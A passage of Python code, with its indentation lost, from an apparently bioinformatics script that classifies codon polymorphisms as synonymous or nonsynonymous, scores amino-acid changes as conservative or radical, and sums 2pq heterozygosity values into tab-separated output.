sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
